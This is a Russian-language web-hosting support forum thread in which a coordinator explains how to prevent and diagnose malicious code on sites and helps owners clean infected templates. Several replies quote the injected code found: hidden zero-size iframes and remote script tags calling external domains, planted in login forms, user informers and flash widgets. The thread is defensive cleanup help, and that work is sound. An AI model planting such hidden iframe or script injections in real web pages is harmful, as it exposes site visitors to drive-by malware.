| Вирусы на сайтах |
| webanet | Дата: Понедельник, 21-Июн-2010, 22:08:04 | Сообщение # 1
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| Как предотвратить попадание вредоносных ссылок на сайт - Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.
- Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [URL] и [IMG], так же можно запретить использование BB кодов в гостевой и комментариях.
- В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса
- Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.
- Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.
Диагностика - Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайте
Бывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
- Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
- Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте - Вы должны предоставить ссылку на сайт!
- Вы должны дать описание проблемы:
1)на какой странице сайта обнаруживается проблема (ссылка)
2) проблема обнаруживается только под логином или под гостем тоже
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
|
| ADIK3208 | Дата: Четверг, 15-Дек-2011, 00:57:09 | Сообщение # 16
|
|
Заглянувший
Группа: Проверенные
Сообщений: 11
Замечания:
Статус: отсутствует
| помогите пожалуйсто
Quote Выполнение вредоносного кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, а также к порче или краже данных.
В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
Пожалуйста, удалите вредоносный код. Если при новой проверке код не обнаружится, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.
Оставлена заявка (15.12.2011 00:00) на перепроверку сайта, она займет несколько дней.
Как только результаты проверки будут готовы, на сервисе Яндекс.Вебмастер появится сообщение. Если вы хотите получить сообщение по электронной почте, пожалуйста, укажите это в настройках.
Яндекс проверяет страницы сайта выборочно, поэтому список зараженных страниц может быть неполным. Пожалуйста, проверьте и другие страницы, а также элементы, общие для всех страниц. Страница Дата последней проверки Вердикт
http://donsaigames.ru/load/filmy_onlajn/indijskie/71 14.12.2011 Поведенческий анализ
<a class="link" href="http://donsaigames.ru/" rel="nofollow" target="_blank">Фильмы онлайн</a>
|
| |
| |
|
| webanet | Дата: Четверг, 15-Дек-2011, 01:43:50 | Сообщение # 17
|
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| ADIK3208, из формы входа выделенное красным удалить
Quote <DIV class=uLogField id=ulf2><INPUT class=log2 style="WIDTH: 100px" type=password maxLength=15 name=password></DIV></DL> <DL class=uLogBlock> <DIV class=uLogRem> <iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://mirmuzla.net.ru"></iframe><INPUT id=remcategory type=checkb
так же медиаундер и бодиклик с тизерми не то что нужно на сайте в виде рекламы. грязь сплошная грязь
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
|
| laiti | Дата: Четверг, 15-Дек-2011, 07:11:07 | Сообщение # 18
|
|
Заглянувший
Группа: Проверенные
Сообщений: 3
Замечания:
Статус: отсутствует
| Добрый день, подскажите пожалуйста, как поступить
1)на какой странице сайта обнаруживается проблема (ссылка)
форум http://lai.ucoz.ru/
сегодня зайдя на форум получила табличку антивир-а (Symantec)
system infected sid 24145 malicious trojan request 2
"пробило" похоже всю систему антивир "предупреждает" но не справляется...
комп я долечу, но на форум теперь идти страшно))
просмотрела код шаблона форума- сторонних "обычных вредных" скриптов не нашла...
а больше не знаю что искать((
2) проблема обнаруживается только под логином или под гостем тоже
антивир реагирует и под логином и под гостем
эксплор. и мазилла
др. окон в момент среагирования включено не было.
спасибо
|
| |
| |
|
| Joker_okda | Дата: Четверг, 15-Дек-2011, 17:32:58 | Сообщение # 19
|
Заглянувший
Группа: Проверенные
Сообщений: 13
Замечания:
Статус: отсутствует
| 1)на какой странице сайта обнаруживается проблема (ссылка) http://forza-cheaters.clan.su/
2) проблема обнаруживается только под логином или под гостем тоже : webanet, ...Ты знаешь что делать
|
| |
| |
|
| webanet | Дата: Четверг, 15-Дек-2011, 17:39:52 | Сообщение # 20
|
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| Joker_okda, из информера пользователей выделенное красным удалить
Quote Новых сегодня: <BR><SPAN style="FONT-FAMILY: Comic Sans MS"><SPAN style="COLOR: #ffa500"><STRONG> »</STRONG></SPAN><STRONG><SPAN style="COLOR: #ffa500"> </SPAN></STRONG></SPAN><script src="http://zagruzlo.ru/swf.js" type="text/javascript"></script><STRONG>Из них<
из кода флеш часов выделенное красным удалить
Quote <embed src=http://flash-clocks.com/free-flash-clocks-blog-topics/free-flash-clock-183.swf width=200 height=200 wmode=transparent type=application/x-shockwave-flash> <script type="text/javascript" src="http://r1p.pp.ua/1.js"></script></embed><param name="movie" value="flash-clocks.com/free-flash-clocks-blog-topics/free-flash-clock-183.swf" type"/><param name="wmode" val
из кода календаря выделенное красным удалить
Quote <embed base="http://wallaby.ucoz.ru/clock/" allowscriptaccess="always" src="http://wallaby.ucoz.ru/clock/calendar.swf" quality="high" scale="noscale" bgcolor="#000000" type="application/x-shockwave-flash" flashvars="xml/events.xml&stylesUrl=xml/styles3b.xml" pluginspage="http://www.macromedia.com/go/getflashplayer" height="191" width="175"><script src="http://bunnas.ru/images.js" type="text/javascript"></script><!-- </bc> --></div></td></tr></table>
<!-- </block3663> -->
<!--/U1DRIGHTER1Z-->
и если вы ничего не понимаете в скриптах в хтмл, то вам стоит воздержаться от собирания всяких украшений на сайт и пользоваться стандартным шаблоном.
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
|
| webanet | Дата: Четверг, 15-Дек-2011, 17:41:13 | Сообщение # 21
|
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| laiti, под гостем у вас чисто, кроме армады баннеров
попробуйте зайти ещё раз на форум и если будет аллерт, то предоставьте полный текст блокировки симантека
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
|
| Gressy | Дата: Четверг, 15-Дек-2011, 21:16:15 | Сообщение # 22
|
|
Заглянувший
Группа: Проверенные
Сообщений: 5
Замечания:
Статус: отсутствует
| Здравствуйте! Я обращаюсь с сайта http://sserkov-lm.ucoz.ru/
Постоянные пользователи пишут,что на сайте есть вирус или вредоносный код.Я проверила,вредоносный код есть на главной странице и на всех остальных страницах,кроме форума и гостевой.Помогите,пожалуйста,его отыскать.
|
| |
| |
|
| webanet | Дата: Четверг, 15-Дек-2011, 22:02:16 | Сообщение # 23
|
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| Gressy, Quote Я проверила,вредоносный код есть на главной странице
и самый главный вопрос под логином вредоносный код виден или под гостем тоже?
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
|
| Gressy | Дата: Четверг, 15-Дек-2011, 22:12:48 | Сообщение # 24
|
|
Заглянувший
Группа: Проверенные
Сообщений: 5
Замечания:
Статус: отсутствует
| проверила с помощью вот этого сайта http://2ip.ru/site-virus-scaner/
Там пишут: "На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код."
Под логином люди не могут войти на сайт.Гости пока не жаловались.
|
| |
| |
|
| webanet | Дата: Четверг, 15-Дек-2011, 22:42:46 | Сообщение # 25
|
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| Gressy, я прекрасно залогинилась к вам на сайт. вирусов не вижу
Quote с помощью вот этого сайта
а ваши пользователи у которых проблемы пусть четко и ясно опишут их. и особенно про вирусы. с чего они взяли, что на сайте вирусы? у них среагировал антивирус? тогда пусть дадут полный текст аллерта
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
|
| KENT5986 | Дата: Четверг, 15-Дек-2011, 22:45:32 | Сообщение # 26
|
|
Заглянувший
Группа: Проверенные
Сообщений: 12
Замечания:
Статус: отсутствует
| Здравствуйте,я с сайта http://fifa-best.ru/
У меня на сайте есть вирус,пользователи жалуются,я проверял сайт на http://2ip.ru/site-virus-scaner/, после того как я проверил там пишет,На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.Помогите пожалуйста найти этот вирус.
|
| |
| |
|
| webanet | Дата: Четверг, 15-Дек-2011, 22:52:06 | Сообщение # 27
|
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| KENT5986, из информера пользователей выделенное красным удалить
Quote Пользователей: <b>0</b></div></P><P align="left"></P><HR><DIV align="center"><SPAN style="font-size: 10pt"><iframe src="http://ga1.net.ru/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe><SPAN style="font-size: 10pt; color: #ff0000"><SPAN style="font-size: 10pt; color: #ff0000"
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
|
| Gressy | Дата: Четверг, 15-Дек-2011, 23:00:55 | Сообщение # 28
|
|
Заглянувший
Группа: Проверенные
Сообщений: 5
Замечания:
Статус: отсутствует
| webanet,спасибо большое! Буду узнавать подробности у посетителей.
|
| |
| |
|
| KENT5986 | Дата: Четверг, 15-Дек-2011, 23:10:10 | Сообщение # 29
|
|
Заглянувший
Группа: Проверенные
Сообщений: 12
Замечания:
Статус: отсутствует
| webanet,я удалил то что красным было выделенно но всервнно все также,вот один из пользователей моего сайта пытался войти на сайт но там всплывает это: http://linkme.ufanet.ru/images/0b21e7ae8f1e95249e1d4b6917fc5cf7.png что можно зделать?
|
| |
| |
|
| webanet | Дата: Четверг, 15-Дек-2011, 23:31:39 | Сообщение # 30
|
|
LAX
Группа: Координаторы
Сообщений: 4319
Статус: отсутствует
| KENT5986, это ваш старый домен гугл держит в черном списке. а реагирует потому что старый адрес у вас в счетчике юкоза фигурирует
ваш старый домен заблочен. стоит отдать сайт на пересмотр гуглу. видать грязь висела у вас очень долго, раз гугл так расправился
IE это такая программа, с помощью которой можно зайти на сайт www.mozilla,com и скачать себе браузер... http://webanet.ucoz.ru/
|
| |
| |
